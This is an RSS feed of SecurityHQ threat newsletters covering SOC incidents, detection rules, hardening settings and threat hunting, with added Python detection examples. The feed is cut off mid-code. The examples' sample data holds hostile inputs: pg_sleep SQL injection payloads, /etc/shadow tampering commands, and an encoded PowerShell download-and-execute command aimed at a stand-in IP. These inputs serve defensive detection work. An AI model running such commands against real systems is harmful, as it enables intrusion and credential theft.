SecurityHQ (https://www.securityhq.com/): Cyber Security Services including Managed Security Services, Professional Services and Compliance. Feed generated Fri, 03 Apr 2026 05:00:03 +0000.

Managed Defense Threat Insights: March 2026 Newsletter
https://www.securityhq.com/blog/managed-defense-threat-insights-march-2026-newsletter/
Fri, 03 Apr 2026 04:59:45 +0000

The post Managed Defense Threat Insights: March 2026 Newsletter appeared first on SecurityHQ.

Cyber Defense Center

Time-Based SQL Injection on Public Facing Website

Detection: The SOC detected time-based SQL injection attempts against the public-facing website of a financial services customer.

Description: The public-facing application was vulnerable to time-based (blind) SQL injection, allowing attackers to manipulate backend database queries. Because the application returns the same page whether or not an injected condition is true, the attacker instead asks the database to pause when the condition holds and measures the response time; repeated one condition at a time, this can extract sensitive data without any error message or data ever appearing in the response. No confirmed data exfiltration was observed during detection.

Attackers crafted malicious payloads (e.g., conditional statements wrapped around delay functions such as PostgreSQL's pg_sleep()) within input parameters to manipulate SQL queries.

Timely detection of the incident prevented exfiltration and potential impact on the website.

Recommendations: Adopt secure coding practices such as parameterized queries and strict input validation to prevent injection attacks. Enhance log monitoring with regex-based detection and deploy a WAF to block malicious payloads. Regular security testing and least privilege access to databases should be enforced.

Lessons Learnt:
Injection vulnerabilities highlight gaps in secure development practices and require proactive mitigation. Continuous monitoring and early detection significantly reduce potential impact.

Direct Send Email Abuse Resulting in Suspicious Sign-In and User Compromise

Detection: A risky sign-in use case fired from Microsoft 365 Defender, identifying anomalous AiTM sign-in activity from an unusual geographic location shortly after the user received a suspicious email. Email logs confirmed the message had entered the tenant via Direct Send, bypassing the usual email authentication checks.

Description: A user account was compromised after the user interacted with a malicious email delivered through the tenant's Direct Send path. Direct Send accepts unauthenticated SMTP at the tenant's MX endpoint, so the attacker could present an internal sender address and have the message accepted without passing the standard email authentication controls (SPF/DKIM/DMARC enforcement) that would have stopped it at an external gateway.

The user engaged with the email, leading to credential exposure. Shortly after, a suspicious sign-in was detected from an unrecognized location/device, indicating unauthorized access.

Recommendations: Restrict or disable Direct Send (Exchange Online now offers a tenant-level Reject Direct Send setting, enabled with Set-OrganizationConfig -RejectDirectSend $true) and enforce strong email authentication with SPF, DKIM and DMARC. Implement MFA and conditional access policies to reduce unauthorized access risks. Regular user awareness training and monitoring of anomalous sign-in activity are essential.

Lessons Learnt:
Internet-exposed email servers, open SMTP, POP and IMAP ports, and misconfigured SPF, DKIM and DMARC records introduce significant security gaps that attackers actively exploit. Strengthening both technical controls and user awareness is critical to reducing phishing-related compromises.

Threat Detection Engineering

New Detections for this Month

Linux: Shadow File Direct Modification Detected (P3)

This detection identifies attempts to modify the /etc/shadow file on Linux systems directly with command-line utilities such as sed, echo, tee, cp or mv. The /etc/shadow file stores password hashes and is highly sensitive; legitimate changes go through passwd, chpasswd, usermod and similar tools, so direct editing with general-purpose utilities is a strong indicator of unauthorized privilege escalation, credential tampering (for example blanking a hash or appending a new account line) or persistence. Keying the rule on command lines catches the tools named above; an auditd watch on the file (auditctl -w /etc/shadow -p wa -k shadow_mod) records every writer regardless of tool and is a useful companion data source.

Security Impact:

  • Detects unauthorized credential manipulation attempts
  • Helps prevent privilege escalation and persistence via password changes
  • Enhances visibility into critical system file tampering on Linux systems

Detection Name: Global: Audit and Compliance: Shadow File Direct Modification Detection.
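The command-line logic behind the detection above, as an added Python example that is not SecurityHQ's rule content: it classifies process-creation events that mention /etc/shadow as writes or reads, following pipelines and sh -c wrappers so that an echo redirected into the file is caught as well as a bare sed -i. The events, hostnames and users are constructed for the example.

```python
"""Added example (not SecurityHQ's detection content): classify Linux
process-creation events that touch /etc/shadow with raw editing tools,
separating writes from reads. Sample events are constructed."""
import re
import shlex

SHADOW = "/etc/shadow"
# Shell redirection straight into the file: echo '...' >> /etc/shadow
REDIRECT_RE = re.compile(r">>?\s*" + re.escape(SHADOW) + r"(?:\s|$)")
SHELLS = {"sh", "bash", "dash", "zsh"}


def classify(cmdline):
    """Return 'write', 'read' or None for a command line mentioning /etc/shadow."""
    if SHADOW not in cmdline:
        return None
    if REDIRECT_RE.search(cmdline):
        return "write"
    try:
        tokens = shlex.split(cmdline)
    except ValueError:              # unbalanced quoting: do not let it slip through
        return "write"
    # Split pipelines / compound commands so each stage is judged on its own argv.
    segments, cur = [], []
    for tok in tokens:
        if tok in ("|", "&&", "||", ";"):
            segments.append(cur)
            cur = []
        else:
            cur.append(tok)
    segments.append(cur)

    verdict = None
    for argv in segments:
        if not argv or not any(SHADOW in a for a in argv):
            continue
        tool = argv[0].rsplit("/", 1)[-1]
        if tool in SHELLS and "-c" in argv and argv.index("-c") + 1 < len(argv):
            inner = classify(argv[argv.index("-c") + 1])   # recurse into sh -c '...'
            if inner == "write":
                return "write"
            verdict = verdict or inner
            continue
        if tool == "sed" and any(a == "--in-place" or a.startswith("-i") for a in argv[1:]):
            return "write"
        if tool == "tee":
            return "write"
        if tool in ("cp", "mv") and argv[-1] == SHADOW:
            return "write"
        verdict = "read"            # cat, grep, sed -n, cp /etc/shadow /tmp/x: read access
    return verdict


def detect(events):
    """Return (host, user, cmdline) for every event classified as a write."""
    return [(e["host"], e["user"], e["cmdline"]) for e in events
            if classify(e["cmdline"]) == "write"]


EVENTS = [   # constructed process-creation records, not real telemetry
    {"host": "web01", "user": "root", "cmdline": "passwd alice"},
    {"host": "web01", "user": "root", "cmdline": "sed -i 's/^root:[^:]*:/root::/' /etc/shadow"},
    {"host": "web01", "user": "www-data",
     "cmdline": "sh -c \"echo 'svc:$6$salt$hash:19800:0:99999:7:::' >> /etc/shadow\""},
    {"host": "db02", "user": "root", "cmdline": "cp /etc/shadow /root/shadow.bak"},
    {"host": "db02", "user": "root", "cmdline": "cp /root/shadow.bak /etc/shadow"},
    {"host": "db02", "user": "root", "cmdline": "cat /etc/shadow | grep '^root'"},
    {"host": "db02", "user": "root", "cmdline": "echo 'svc:x:19800::::::' | tee -a /etc/shadow"},
]

if __name__ == "__main__":
    for host, user, cmd in detect(EVENTS):
        print(f"[P3] {host} {user}: {cmd}")
```

The read verdicts (cat, or cp with /etc/shadow as the source) are deliberately kept separate: they are not this rule's trigger, but copying the file out is hash theft and is worth its own lower-priority alert.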

Global Administrator Elevation to Azure Subscription Owner (P3)

Detect instances where a Global Administrator elevates their privileges to become an Azure Subscription Owner, which grants full control over all resources within the subscription. Global Administrator is an Entra ID role and carries no Azure RBAC permissions by itself; the "Elevate access" switch grants the account User Access Administrator at the root scope, from where it can assign itself Owner on any subscription. The elevation is written to the Azure Activity Log as Microsoft.Authorization/elevateAccess/action and is meant to be temporary, so an elevation followed by an Owner role assignment is highly sensitive and may indicate privilege escalation, misuse of administrative rights, or potential account compromise.

Security Impact:

  • Full administrative control over Azure subscription
  • Ability to:
    • Modify or delete resources
    • Grant permissions to other users

Detection Name: Global: Audit and Compliance: Global Administrator Elevation to Azure Subscription Owner
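The correlation behind this detection, as an added Python example that is not SecurityHQ's rule: an elevate-access entry followed within a window by an Owner role assignment from the same caller, with a flag for self-assignment. The records are constructed and only loosely shaped like Azure Activity Log entries; the field names (caller, callerObjectId, properties.requestbody) and the subscription and object IDs are assumptions for the example. The Owner role definition ID is the built-in one.

```python
"""Added example (not SecurityHQ's rule): correlate an Azure Activity Log
elevate-access entry with a later Owner role assignment by the same caller.
Records are constructed and only loosely shaped like Activity Log entries;
field names and IDs are assumptions."""
import json
from datetime import datetime, timedelta

OWNER_ROLE_ID = "8e3af657-a8ff-443c-a75c-2fe8c4bcb635"       # built-in Owner role definition
ELEVATE_OP = "Microsoft.Authorization/elevateAccess/action"   # Global Admin "Elevate access"
ROLE_WRITE_OP = "Microsoft.Authorization/roleAssignments/write"
SUB = "11111111-1111-1111-1111-111111111111"                 # constructed subscription ID
ADMIN_OID = "aaaaaaaa-0000-0000-0000-000000000001"           # constructed GA object ID


def role_write(caller, caller_oid, principal, role_id, when):
    """Build a constructed roleAssignments/write record with a request body."""
    body = {"Properties": {
        "PrincipalId": principal, "PrincipalType": "User",
        "RoleDefinitionId": f"/subscriptions/{SUB}/providers/Microsoft.Authorization/roleDefinitions/{role_id}",
        "Scope": f"/subscriptions/{SUB}"}}
    return {"caller": caller, "callerObjectId": caller_oid, "operationName": ROLE_WRITE_OP,
            "status": "Succeeded", "eventTimestamp": when,
            "resourceId": f"/subscriptions/{SUB}/providers/Microsoft.Authorization/roleAssignments/deadbeef",
            "properties": {"requestbody": json.dumps(body)}}


EVENTS = [
    {"caller": "ga@contoso.example", "callerObjectId": ADMIN_OID, "operationName": ELEVATE_OP,
     "status": "Succeeded", "eventTimestamp": "2026-03-10T08:00:00+00:00", "resourceId": "/",
     "properties": {}},
    # Four minutes later the same GA grants itself Owner on a subscription.
    role_write("ga@contoso.example", ADMIN_OID, ADMIN_OID, OWNER_ROLE_ID, "2026-03-10T08:04:00+00:00"),
    # Reader assignment by an ordinary subscription admin: no elevation, not Owner.
    role_write("ops@contoso.example", "bbbbbbbb-0000-0000-0000-000000000002",
               "cccccccc-0000-0000-0000-000000000003",
               "acdd72a7-3385-48ef-bd42-f606fba81ae7", "2026-03-10T09:00:00+00:00"),
    # Owner assignment by the same GA three days later: outside the window.
    role_write("ga@contoso.example", ADMIN_OID, "dddddddd-0000-0000-0000-000000000004",
               OWNER_ROLE_ID, "2026-03-13T12:00:00+00:00"),
]


def subscription_of(scope):
    parts = scope.strip("/").split("/")
    return parts[1] if len(parts) > 1 and parts[0].lower() == "subscriptions" else scope


def correlate(events, window=timedelta(hours=24)):
    """Owner assignments that follow an elevate-access by the same caller within `window`."""
    elevations = {}
    for e in events:
        if e["operationName"] == ELEVATE_OP and e["status"] == "Succeeded":
            elevations.setdefault(e["caller"], []).append(datetime.fromisoformat(e["eventTimestamp"]))
    alerts = []
    for e in events:
        if e["operationName"] != ROLE_WRITE_OP or e["status"] != "Succeeded":
            continue
        props = json.loads(e["properties"]["requestbody"]).get("Properties", {})
        if props.get("RoleDefinitionId", "").rsplit("/", 1)[-1].lower() != OWNER_ROLE_ID:
            continue
        ts = datetime.fromisoformat(e["eventTimestamp"])
        prior = [t for t in elevations.get(e["caller"], []) if timedelta(0) <= ts - t <= window]
        if not prior:
            continue
        alerts.append({
            "caller": e["caller"],
            "subscription": subscription_of(props.get("Scope", e["resourceId"])),
            "self_assigned": props.get("PrincipalId") == e["callerObjectId"],
            "minutes_after_elevation": int((ts - max(prior)).total_seconds() // 60),
        })
    return alerts


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(a)
```

A follow-up check worth adding in production is whether the elevated access was removed afterwards: the root-scope User Access Administrator assignment is meant to be short-lived, and one left in place is a standing escalation path.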


Threat Management

SecurityHQ’s Threat Management Team manages various endpoint security, cloud security and network security solutions for customers. The following section highlights some key security insights.

From ClickFix to Credentials Theft: Defeating the Latest Stealer & Loader Tactics

What is a Stealer:

An information stealer is malware designed to silently harvest sensitive data from an infected endpoint: browser-saved credentials, session cookies, crypto wallets, VPN configs, RDP files and autofill data. It exfiltrates everything to an attacker-controlled server, typically within seconds of execution, then deletes itself. No persistence is required because the damage is done immediately.

What is a Loader:

A loader is malware whose sole purpose is to establish a foothold on a victim machine and silently fetch and execute a secondary payload: a stealer, ransomware, RAT or banking trojan. Loaders are intentionally lightweight and heavily obfuscated to bypass AV and EDR. They are typically the first stage in a multi-phase attack chain.

Why This is Particularly Dangerous
Stealers and loaders pose a critical risk by combining rapid data theft with follow-on malware delivery. A stealer can quickly harvest sensitive information such as browser credentials, cookies, and VPN access and exfiltrate it almost instantly, while a loader operates in the background to fetch and execute additional malicious payloads. This combination allows attackers to move from initial access to full network compromise, enabling credential abuse, lateral movement, and deployment of ransomware or other advanced threats.

SecurityHQ Recommendations:

Method 1. Configure Attack Surface Reduction rules and credential protection in MDE

The following ASR rules directly target the delivery chains and execution techniques used by stealers and loaders, including LOLBin abuse, script execution and LSASS credential access. Roll each rule out in Audit mode first and review the resulting ASR events before switching to Block; "Block process creations from PSExec and WMI" in particular is incompatible with management tooling that relies on WMI, including the Configuration Manager client.

Microsoft Defender Portal (security.microsoft.com) > Settings > Endpoints > Attack surface reduction rules

Policy / Setting Status
Block execution of potentially obfuscated scripts Block
Block Office apps from creating child processes Block
Block Win32 API calls from Office macros Block
Block process creations from PSExec and WMI Block
Block credential stealing from Windows LSASS Block
Block untrusted and unsigned processes from USB Block
Block JavaScript or VBScript from launching downloaded executable content Block

Method 2. Enable Credential Guard and LSASS protection

Enable the following options from MDE and Intune for Credential Guard and LSASS protection.

Policy / Setting Status
Credential Guard (via Intune device configuration) Enable
LSASS process protection (RunAsPPL) Enable
EDR in block mode Enable
Network protection Enable

Method 3. Configure CrowdStrike Falcon prevention policy and IOA rules for stealer and loader detection

Configure the prevention policy: credential theft and LOLBin protections.

Falcon Console > Endpoint Security > Prevention Policies > [Custom Policy]

Policy / Setting Status
Suspicious script and command prevention Block
Credential dumping prevention Block
Enhanced DLL load visibility Enable
Suspicious process prevention Block

Threat Hunting

SecurityHQ’s Threat Hunting team conducted hunts focused on general endpoint activities seen in the customer’s environment. The following section highlights the hypothesis, hunts and top actions recommended to the customers.

Hypothesis:

An adversary may be operating on one or more endpoints by abusing legitimate system processes and native operating system functionality to establish persistence, perform internal reconnaissance, and exfiltrate data in a low-noise manner.

These activities are designed to evade traditional signature-based detections and can be identified through behavioral anomalies observed in process execution, registry modifications, service creation, and network telemetry collected via EDR.

Context:

This threat hunt focuses on detecting stealthy adversarial behavior that leverages trusted system binaries and native OS utilities (Living-off-the-Land techniques) to bypass conventional security controls.

Attackers increasingly avoid dropping obvious malware and instead rely on:

  • Legitimate tools such as PowerShell, CMD, WMIC, and system services
  • Execution from user-writable directories (e.g., AppData, Temp, Downloads)
  • Native persistence mechanisms (registry keys, services)
  • Low-frequency, high-evasion data exfiltration methods

Because these techniques blend with normal administrative activity, detection requires behavioral analysis and anomaly-based hunting rather than reliance on static signatures.

The investigation analyzes:

  • Process execution patterns and command-line behavior
  • Registry modifications associated with persistence
  • Service installation activity
  • Endpoint reconnaissance indicators
  • Outbound network communication patterns
  • Use of obfuscation in command execution

The goal is to identify early-stage compromise, persistence establishment, and potential data exfiltration while minimizing false positives through contextual filtering and baselining.

Threat Hunting Approaches:

1. Execution & Persistence Abuse Detection

Analyze execution of trusted system binaries (e.g., PowerShell, CMD, WMIC, svchost) from non-standard or user-writable paths, along with monitoring:

  • Suspicious service creation
  • Registry persistence (Run keys, Winlogon, IFEO, SilentProcessExit)

These behaviours indicate living-off-the-land abuse and persistence establishment.

2. Behavioral & Command Execution Analysis

Identify anomalous process behaviour such as:

  • High-frequency reconnaissance commands (whoami, net user, nltest, ipconfig)
  • Obfuscated or encoded command execution (-enc, iex, Base64)
  • Unusual parent-child process relationships

These patterns help detect stealthy attacker activity and defense evasion techniques.

3. Network & Exfiltration Activity Monitoring

Monitor outbound network activity to detect:

  • Connections to rare or unapproved file-sharing domains
  • Non-browser processes initiating external communication
  • Low-frequency or beacon-like traffic patterns

Correlate process and network telemetry to uncover data exfiltration and command-and-control activity.
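The three hunting approaches above, as an added Python example that is not SecurityHQ's hunt queries: it runs over constructed EDR-style process and network events and flags trusted binaries launched from user-writable paths, decoded -EncodedCommand payloads that download or Invoke-Expression, Office applications spawning interpreters, bursts of reconnaissance commands, and outbound connections whose timing barely varies. Field names, hosts, addresses and thresholds are assumptions to be tuned against the environment's own baseline.

```python
"""Added example (not SecurityHQ's hunt queries): the three hunting approaches
above run over constructed EDR-style process and network events. Field
names, hosts, addresses and thresholds are assumptions for the example."""
import base64
import re
import statistics
from collections import defaultdict
from datetime import datetime

TRUSTED_BINS = {"powershell.exe", "cmd.exe", "wmic.exe", "svchost.exe", "rundll32.exe"}
WRITABLE_DIRS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")
OFFICE = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
RECON_RE = re.compile(
    r"^(?:.*\\)?(?:whoami|nltest|ipconfig|systeminfo|quser|tasklist)(?:\.exe)?\b"
    r"|^(?:.*\\)?net1?(?:\.exe)?\s+(?:user|group|localgroup|view)\b", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -enc/-e/-ec/-EncodedCommand, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower().lstrip("-/") in ("e", "ec", "enc", "encodedcommand"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def hunt_processes(events, burst=4, burst_window_s=600):
    """Approaches 1 and 2: return (host, rule, detail) tuples."""
    alerts, recon_times = [], defaultdict(list)
    for e in events:
        image, parent, cmd = e["image"].rsplit("\\", 1)[-1].lower(), e["parent"].lower(), e["cmdline"]
        if image in TRUSTED_BINS and any(d in e["image"].lower() for d in WRITABLE_DIRS):
            alerts.append((e["host"], "trusted_binary_from_writable_path", e["image"]))
        decoded = decode_encoded_command(cmd)
        if decoded and re.search(r"iex|invoke-expression|downloadstring|webclient", decoded, re.I):
            alerts.append((e["host"], "encoded_command_with_download_or_iex", decoded))
        if parent in OFFICE and image in INTERPRETERS:
            alerts.append((e["host"], "office_spawned_interpreter", f"{parent} -> {image}"))
        if RECON_RE.search(cmd):
            recon_times[e["host"]].append(datetime.fromisoformat(e["time"]))
    for host, times in recon_times.items():          # N recon commands inside one window
        times.sort()
        if any((times[i + burst - 1] - times[i]).total_seconds() <= burst_window_s
               for i in range(len(times) - burst + 1)):
            alerts.append((host, "recon_burst", f"{burst}+ recon commands within {burst_window_s}s"))
    return alerts


def beacon_candidates(net_events, min_conns=5, max_cv=0.15):
    """Approach 3: (host, process, dest) tuples whose connection intervals barely vary."""
    by_key = defaultdict(list)
    for n in net_events:
        by_key[(n["host"], n["process"], n["dest"])].append(datetime.fromisoformat(n["time"]))
    out = []
    for key, times in by_key.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_cv:   # low jitter = beacon-like
            out.append((key, round(mean)))
    return out


# Constructed sample telemetry (not real customer data).
ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.20/a.ps1')".encode("utf-16-le")).decode()
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SYS32 = "C:\\Windows\\System32\\"
PROC_EVENTS = [
    {"host": "WS01", "time": "2026-03-05T10:00:00", "parent": "explorer.exe",
     "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"host": "WS01", "time": "2026-03-05T10:00:30", "parent": "WINWORD.EXE", "image": PS,
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"host": "WS01", "time": "2026-03-05T10:01:00", "parent": "powershell.exe", "image": SYS32 + "whoami.exe", "cmdline": "whoami /all"},
    {"host": "WS01", "time": "2026-03-05T10:01:20", "parent": "powershell.exe", "image": SYS32 + "net.exe", "cmdline": "net user"},
    {"host": "WS01", "time": "2026-03-05T10:02:00", "parent": "powershell.exe", "image": SYS32 + "nltest.exe", "cmdline": "nltest /dclist:corp"},
    {"host": "WS01", "time": "2026-03-05T10:03:00", "parent": "powershell.exe", "image": SYS32 + "ipconfig.exe", "cmdline": "ipconfig /all"},
    {"host": "WS02", "time": "2026-03-05T10:05:00", "parent": "explorer.exe", "image": SYS32 + "cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"host": "WS02", "time": "2026-03-05T10:06:00", "parent": "cmd.exe", "image": SYS32 + "ipconfig.exe", "cmdline": "ipconfig /all"},
]
NET_EVENTS = [  # regsvr32.exe checking in about once a minute; Edge browsing irregularly
    {"host": "WS01", "process": "regsvr32.exe", "dest": "198.51.100.20:443", "time": t}
    for t in ("2026-03-05T10:00:00", "2026-03-05T10:01:02", "2026-03-05T10:02:01",
              "2026-03-05T10:03:03", "2026-03-05T10:04:00", "2026-03-05T10:05:02")
] + [
    {"host": "WS01", "process": "msedge.exe", "dest": "www.example.com:443", "time": t}
    for t in ("2026-03-05T10:00:00", "2026-03-05T10:00:05", "2026-03-05T10:03:40",
              "2026-03-05T10:04:02", "2026-03-05T10:12:00")
]
```

The single administrator's ipconfig on WS02 produces nothing, which is the point of the burst threshold: one recon command is routine, four inside ten minutes from one host is an operator orienting. Decoding the encoded command rather than merely flagging -enc is what separates a malicious payload from the many legitimate management scripts that also use it.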

Recommendations: Based on the observed threat landscape, the following actions are recommended:

  • Enable PowerShell Constrained Language Mode for non-admin users.
  • Block PowerShell execution by non-admin users, or at minimum restrict encoded commands (-EncodedCommand) and Invoke-Expression.
  • Restrict script execution from user-writable directories such as %AppData%, %Temp%, Downloads and %Public%, and apply tighter PowerShell policies for non-admin users.
  • Eliminate or strictly restrict Internet-exposed authentication services, especially SMB.
  • Block non-admin modification of autostart registry keys such as HKCU\...\Run and HKLM\...\Run.
  • Alert on registry values that store network configuration, such as values containing IP:port patterns.
  • Block .ps1, .vbs and .js files at the email and web gateways.
  • Enforce outbound filtering for non-browser processes.
  • Restrict communication to file-sharing cloud domains that are not approved by the organization.

Incident Response – Success Story

Time-Based SQL Injection Attempt

Overview

SecurityHQ SOC identified a time-based SQL injection attempt targeting a public-facing web application belonging to a financial services customer. A major incident management call was immediately set up with key stakeholders and the Incident Response team.

The attack leveraged database delay functions to probe backend query execution behavior, indicating an attempt to validate input handling weaknesses and potentially extract sensitive data.

Early detection and response ensured that the activity was contained before any confirmed data exfiltration or service disruption occurred.

What Happened

During routine monitoring, the SOC detected anomalous web application requests containing crafted SQL payloads designed to manipulate backend database queries.

The attacker utilized time-based techniques, specifically injecting conditional logic combined with delay functions (e.g., PG_SLEEP), to observe response timing differences. This method allows attackers to infer database responses without directly retrieving data.

Key observations:

  • Malicious payloads embedded within application input parameters
  • Repeated requests introducing intentional delays to validate vulnerability
  • Indicators consistent with blind SQL injection techniques
  • No evidence of successful data extraction or lateral movement

The activity suggests that the attacker was in the reconnaissance and validation phase, attempting to confirm exploitability before proceeding to data extraction.

Threat Actor Attribution (Assessment):

At this stage, there is no direct attribution to a specific threat group.

However, the observed techniques align with opportunistic attackers or automated scanning tools targeting publicly exposed applications.

SecurityHQ IR team successfully responded to the incident, thereby limiting the impact, and carried out the necessary response actions, including hardening of existing security controls to prevent future recurrences.

Here are key Strategic Controls that can prevent similar incidents in your environment:

  • Implement parameterized queries / prepared statements to eliminate SQL injection risks.
  • Enforce strict input validation and sanitization across all user inputs.
  • Conduct regular secure code reviews.
  • Deploy regex-based detection rules to identify SQL injection patterns.
  • Perform regular vulnerability assessments and penetration testing (VAPT).
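The regex-based detection and parameterized-query controls recommended both here and in the Cyber Defense Center write-up of the same incident, as an added Python example that is not SecurityHQ's rule or the customer's code. The access-log format, IP addresses and paths are constructed for the example; because SQLite has no sleep function, the query demonstration uses a boolean payload to show why string-built SQL fails where a bound parameter does not.

```python
"""Added example (not SecurityHQ's detection rule or the customer's code):
regex detection of time-based SQL injection probes over constructed access
log lines, beside the string-built query that makes such probes work and
its parameterized fix. Log format, addresses and paths are assumptions."""
import re
import sqlite3
from urllib.parse import unquote_plus

# Delay primitives across common engines; the incident above used pg_sleep.
DELAY_RE = re.compile(
    r"pg_sleep\s*\(|\bsleep\s*\(|waitfor\s+delay\b|benchmark\s*\(|dbms_lock\.sleep",
    re.IGNORECASE)

# Combined log format with the response time in milliseconds as a final field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<ms>\d+)$')

SAMPLE_LOG = """\
203.0.113.7 - - [03/Mar/2026:10:01:02 +0000] "GET /accounts?id=42 HTTP/1.1" 200 1834 "-" "Mozilla/5.0" 41
203.0.113.7 - - [03/Mar/2026:10:01:09 +0000] "GET /accounts?id=42%27%3BSELECT%20CASE%20WHEN%20(1=1)%20THEN%20pg_sleep(5)%20ELSE%20pg_sleep(0)%20END-- HTTP/1.1" 200 1834 "-" "Mozilla/5.0" 5043
203.0.113.7 - - [03/Mar/2026:10:01:21 +0000] "GET /accounts?id=42%27%20AND%20(SELECT%20pg_sleep(5))%20IS%20NULL-- HTTP/1.1" 200 1834 "-" "Mozilla/5.0" 5039
198.51.100.9 - - [03/Mar/2026:10:02:00 +0000] "GET /search?q=sleep+study HTTP/1.1" 200 900 "-" "Mozilla/5.0" 38
"""


def find_sqli_probes(log_text, slow_ms=3000):
    """Return (ip, decoded path, response ms, timing corroborated) per suspicious request.

    The payload match is a signature; a response time at or above the requested
    delay is the behavioural confirmation that the injected query really ran."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote_plus(m["path"])        # payloads arrive URL-encoded
        if DELAY_RE.search(decoded):
            ms = int(m["ms"])
            hits.append((m["ip"], decoded, ms, ms >= slow_ms))
    return hits


def lookup_vulnerable(conn, account_id):
    # Vulnerable: user input is concatenated into the SQL text (the 'before').
    return conn.execute(f"SELECT name FROM accounts WHERE id = '{account_id}'").fetchall()


def lookup_safe(conn, account_id):
    # Parameterized: the driver binds the value, so it can never become SQL syntax.
    return conn.execute("SELECT name FROM accounts WHERE id = ?", (account_id,)).fetchall()


def demo_queries():
    """Same payload against both lookups: (rows from vulnerable, rows from safe)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", [("42", "alice"), ("43", "bob")])
    payload = "42' OR '1'='1"
    return len(lookup_vulnerable(conn, payload)), len(lookup_safe(conn, payload))


if __name__ == "__main__":
    for ip, path, ms, slow in find_sqli_probes(SAMPLE_LOG):
        print(f"{ip} {ms}ms {'CONFIRMED' if slow else 'signature only'} {path}")
    print("rows returned (vulnerable, safe):", demo_queries())
```

Alert on the pair: a delay signature with a normal response time is most likely a probe the WAF or the query parser rejected, while a signature with a response time near the requested delay means the database executed attacker-controlled SQL and the application is exploitable.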



Managed Defense Threat Insights: February 2026 Newsletter
https://www.securityhq.com/blog/managed-defense-threat-insights-february-2026-newsletter/
Wed, 04 Mar 2026 11:43:54 +0000

The post Managed Defense Threat Insights: February 2026 Newsletter appeared first on SecurityHQ.

Cyber Defense Center

Exposed Virtual Machine on Azure was enumerated by attackers

Detection: Use cases fired for login attempts from a “non-compliant” host as well as login failures for the high-privileged account “KRBTGT”.

Description: Threat actors have been observed actively scanning the internet for exposed hosts by targeting port 3389 (RDP). Once such hosts are identified, they attempt brute-force attacks using commonly used generic account names, including highly privileged ones such as KRBTGT. KRBTGT is disabled by default and cannot be used for interactive logon, so attempts against it will never succeed, but they are a reliable signal of indiscriminate credential spraying against the host.

Through early detection of brute-force activity and identification of a non-compliant host, the team was able to locate the exposed system and validate its exposure using OSINT platforms.

Recommendations: Block inbound port 3389 at all perimeter boundaries and NSGs, and verify that no production VMs expose management ports to the Internet. Strengthen authentication controls by implementing account lockout thresholds, enforcing strong password policies and disabling unused local accounts.

Lessons Learnt:
Organizations should conduct perimeter firewall audits regularly and block open management ports on all Internet-exposed services.
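One way to do the NSG part of that audit, as an added Python example that is not SecurityHQ tooling: walk inbound rules in priority order the way the NSG engine does and report management ports that an Internet-sourced TCP flow would reach through an Allow rule. The rules are constructed and only loosely shaped like `az network nsg rule list` output; rule names, priorities and the port list are assumptions.

```python
"""Added example (not SecurityHQ tooling): find management ports reachable
from the Internet in a set of NSG rules, honouring priority order. Rules are
constructed and loosely shaped like `az network nsg rule list` output."""
MGMT_PORTS = {3389: "RDP", 22: "SSH", 5985: "WinRM", 5986: "WinRM-HTTPS"}
INTERNET_SOURCES = {"*", "internet", "0.0.0.0/0", "any"}


def port_ranges(rule):
    """Expand destinationPortRange / destinationPortRanges into (lo, hi) tuples."""
    raw = [rule.get("destinationPortRange")] + list(rule.get("destinationPortRanges", []))
    out = []
    for r in raw:
        if not r:
            continue
        if r == "*":
            out.append((0, 65535))
        elif "-" in r:
            lo, hi = r.split("-", 1)
            out.append((int(lo), int(hi)))
        else:
            out.append((int(r), int(r)))
    return out


def matches_internet_tcp(rule, port):
    """Would this rule match a TCP flow from an arbitrary Internet address to `port`?"""
    sources = [rule.get("sourceAddressPrefix")] + list(rule.get("sourceAddressPrefixes", []))
    return (rule["direction"].lower() == "inbound"
            and rule["protocol"].lower() in ("*", "tcp")
            and any(s and s.lower() in INTERNET_SOURCES for s in sources)
            and any(lo <= port <= hi for lo, hi in port_ranges(rule)))


def exposed_mgmt_ports(rules):
    """First matching rule in priority order decides; the default DenyAllInBound applies if none does."""
    ordered = sorted(rules, key=lambda r: r["priority"])
    findings = []
    for port, name in MGMT_PORTS.items():
        for r in ordered:
            if matches_internet_tcp(r, port):
                if r["access"].lower() == "allow":
                    findings.append((name, port, r["name"], r["priority"]))
                break
    return findings


RULES = [   # constructed NSG, not a customer's
    {"name": "AllowRDP", "priority": 100, "direction": "Inbound", "access": "Allow", "protocol": "Tcp",
     "sourceAddressPrefix": "*", "destinationPortRange": "3389"},
    {"name": "DenyMgmtFromInternet", "priority": 200, "direction": "Inbound", "access": "Deny", "protocol": "*",
     "sourceAddressPrefix": "Internet", "destinationPortRanges": ["22", "3389"]},
    {"name": "AllowSSHFromBastion", "priority": 300, "direction": "Inbound", "access": "Allow", "protocol": "Tcp",
     "sourceAddressPrefix": "10.0.1.0/24", "destinationPortRange": "22"},
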